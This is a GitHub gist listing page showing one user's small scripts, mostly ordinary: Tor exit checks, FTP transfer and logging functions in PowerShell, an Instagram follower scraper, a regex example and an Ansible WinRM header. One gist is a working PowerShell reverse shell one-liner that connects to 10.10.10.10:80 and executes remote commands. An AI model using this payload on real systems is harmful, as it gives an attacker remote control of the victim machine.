Skip to content

Instantly share code, notes, and snippets.

View atao's full-sized avatar

ATAO atao

View GitHub Profile
@atao
atao / check_tor.py
Last active February 6, 2024 21:08
Check Tor exit node IP
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
from lxml import html
proxy_url = "socks5://localhost:9050"
proxies = {"http": proxy_url, "https": proxy_url}
r = requests.Session()
#!/bin/bash
if ! command -v toilet -h &> /dev/null
then
echo "toilet could not be found"
exit
fi
if (( $# == 0 )); then
echo "No parameters provided"
@atao
atao / powershell_reverse_shell.ps1
Created April 7, 2020 21:46 — forked from egre55/powershell_reverse_shell.ps1
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@atao
atao / journalisation.ps1
Last active December 19, 2019 10:00
Fonctions de journalisation #PowerShell
#region Journalisation
function initLog {
param(
[string]$loggerPath = "$PSScriptRoot\file.log"
)
if (!(Test-Path $loggerPath)){New-Item -Path $loggerPath -ItemType File}
loggerInfo "-----------------------------------------------" $loggerPath
loggerInfo "+ Programme : BackupAndSend" $loggerPath
loggerInfo "+ Version : 18/12/2019" $loggerPath
loggerInfo "-----------------------------------------------" $loggerPath
@atao
atao / GetByFTP.ps1
Last active February 27, 2020 11:19
function GetByFTP
function GetByFTP()
{
param (
$userFTP = "anonymous",
$passFTP = "anonymous",
[Parameter(Mandatory=$True)]$serverFTP,
[Parameter(Mandatory=$True)]$localPath,
[Parameter(Mandatory=$True)]$remoteFile
)
$localFile = Join-Path -Path $localPath -ChildPath $remoteFile.split('/')[-1]
@atao
atao / instagram.py
Created August 6, 2019 08:23
Get number of instagram followers
import requests
import re
username = "UserProfile"
try:
r = requests.get('https://www.instagram.com/'+username)
followers = re.findall( r'userInteractionCount":"(\d*)"', r.text)
user = re.findall( r'alternateName":"@(\w+)', r.text)
print("@"+ user[0], ":", followers[0], "followers")
@atao
atao / SendByFTP.ps1
Last active April 25, 2019 15:21
function SendByFTP
function SendByFTP {
param (
$userFTP = "anonymous",
$passFTP = "anonymous",
[Parameter(Mandatory=$True)]$serverFTP,
[Parameter(Mandatory=$True)]$localFile,
[Parameter(Mandatory=$True)]$remotePath
)
if(Test-Path $localFile){
$remoteFile = $localFile.Split("\")[-1]
@atao
atao / regex.ps1
Created December 18, 2018 14:19
Regex example in PowerShell
$message = '(001945) 12/18/2018 10:50:47 AM - (not logged in) (127.0.0.1)> 530 Login or password incorrect!'
$message -match '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b)(.*)(incorrect!)'
$Matches[0]
$Matches[1]
$Matches[2]
$Matches[3]
#Requires -Version 3.0
# Configure a Windows host for remote management with Ansible
# -----------------------------------------------------------
#
# This script checks the current WinRM (PS Remoting) configuration and makes
# the necessary changes to allow Ansible to connect, authenticate and
# execute PowerShell commands.
#
# All events are logged to the Windows EventLog, useful for unattended runs.